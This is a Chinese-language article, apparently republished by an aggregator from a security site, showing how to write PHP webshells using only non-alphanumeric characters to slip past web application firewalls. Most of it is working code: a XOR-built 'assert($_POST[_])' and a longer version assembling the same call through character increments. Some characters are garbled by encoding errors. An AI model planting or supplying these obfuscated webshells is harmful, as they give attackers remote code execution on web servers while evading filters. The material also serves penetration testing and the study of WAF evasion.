話不多說，我們直奔主題！

一般來說，我們所寫的webshell通常都會(huì)包含數(shù)字或字母。比如說下面這樣：<?php

if(!preg_match('/[a-z0-9]/is',$_GET['shell'])){

eval($_GET['shell']);

}

但如果你想要繞過WAF的話，你還得使用一些其他的技術(shù)來重寫你的webshell。

思路

首先我們要明確思路，我的核心思想就是通過一系列字符變換最終利用非字母和非數(shù)字字符構(gòu)建出webshell，然后使用PHP的動(dòng)態(tài)函數(shù)(例如“assert”)來完成函數(shù)名的拼接，最后動(dòng)態(tài)執(zhí)行構(gòu)建出來的代碼。

所以，轉(zhuǎn)換方法就是解決這一問題的重點(diǎn)了。但是在開始之前，我需要跟大家討論以下php5和php7之間的區(qū)別。

php5的斷言(assert)是通過函數(shù)實(shí)現(xiàn)的，我們可以使用$f='assert';$f(...);這種方法來動(dòng)態(tài)執(zhí)行任意代碼。但是在php7中，斷言已經(jīng)不再是一個(gè)函數(shù)了，而是一種語言結(jié)構(gòu)(類似eval)，而且斷言(assert)也無法再作為函數(shù)名來實(shí)現(xiàn)代碼的動(dòng)態(tài)執(zhí)行了，所以對(duì)于php7來說，問題可能會(huì)變得更加復(fù)雜了。不過各位也不用太過擔(dān)心，因?yàn)槲覀兛梢允褂?file_put_contents函數(shù)來達(dá)到我們的目的。

為了方便起見，本文的實(shí)驗(yàn)環(huán)境使用的是php5，關(guān)于php7的利用方式就請(qǐng)各位自行去探索啦:D

方法一

這是一種最簡(jiǎn)單的方法了。在php中，我們可以通過異或運(yùn)算(XOR)來得到一個(gè)或兩個(gè)字符串。因此，如果我們想要得到一個(gè)a-z之間的英文字符，我們就可以通過兩個(gè)非字母字符和字符數(shù)來生成所需要的字母字符。示例代碼如下：<?php $_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`'); //$_='assert';

$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']');// $__='_POST';

$___=$$__;

$_($___[_]); // assert($_POST[_]);

解析結(jié)果如下：

方法二

在這種方法中，我們可以使用一些特殊的小技巧來實(shí)現(xiàn)我們的目標(biāo)。首先，請(qǐng)大家參考php.net的這份文檔：【傳送門】

文檔中寫到：“在處理字符變量的算術(shù)運(yùn)算時(shí)，PHP遵循的是Perl的規(guī)范，而并非C語言規(guī)范。比如說在PHP和Perl中，$a = ‘Z’; $a++;經(jīng)過計(jì)算之后變量$a會(huì)變成?‘AA’，但是在C語言中，a = ‘Z’; a++;計(jì)算后會(huì)將a變?yōu)椤甗’(‘Z’的ASCII值為90，‘[’的ASCII值為91)。請(qǐng)注意，字符變量可以進(jìn)行自增運(yùn)算但無法進(jìn)行自減運(yùn)算，而且只有ASCII字母和數(shù)字(a-z，A-Z，0-9)才支持這種運(yùn)算，如果對(duì)其他字符變量進(jìn)行這種運(yùn)算將不會(huì)有任何作用，此時(shí)的原始字符串將保持不變?！?/p>

那么接下來，我們應(yīng)該如何才能得到一個(gè)包含字符‘a(chǎn)’的變量呢？

字符串“Array”的首字母是一個(gè)大寫的‘A’，而第四個(gè)字母則是一個(gè)小寫的‘a(chǎn)’。換句話說，我們可以通過這個(gè)字符串同時(shí)得到大寫和小寫的字母‘a(chǎn)’(A)，這也就意味著我們可以通過這種方法得到a-z和A-Z中任意一個(gè)字母字符。

比如說在PHP中，如果你想拼接數(shù)組和字符串，那么你首先要將字符串(array)轉(zhuǎn)換成一個(gè)字符串(這個(gè)字符串的值為Array)：

然后截取字符串的首字母，我們就得到了‘A’。

利用這項(xiàng)技術(shù)，我編寫了如下所示的webshell(由于PHP函數(shù)是對(duì)大小寫敏感的，所以我在結(jié)尾補(bǔ)上了ASSERT($_POST[_]))：<?php

$_=[];

$_=@"$_"; // $_='Array';

$_=$_['!'=='@']; // $_=$_[0];

$___=$_; // A

$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;

$___.=$__; // S

$___.=$__; // S

$__=$_;

$__++;$__++;$__++;$__++; // E

$___.=$__;

$__=$_;

$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;// R

$___.=$__;

$__=$_;

$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;// T

$___.=$__;

$____='_';

$__=$_;

$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;// P

$____.=$__;

$__=$_;

$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;// O

$____.=$__;

$__=$_;

$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;// S

$____.=$__;

$__=$_;

$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;// T

$____.=$__;

$_=$$____;

$___($_[_]); // ASSERT($_POST[_]);

解析結(jié)果如下圖所示:

總結(jié)

很多網(wǎng)站現(xiàn)在都會(huì)對(duì)特殊字符進(jìn)行過濾和檢測(cè)，因此希望這項(xiàng)技術(shù)可以給各位Web滲透測(cè)試人員提供一些解決問題的思路。

* 參考來源：securityonline，leavesongs , ?FB小編Alpha_h4ck編譯，轉(zhuǎn)載請(qǐng)注明來自FreeBuf.COM

總結(jié)

以上是生活随笔為你收集整理的php非,通过非数字和字符的方式实现PHP WebShell的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。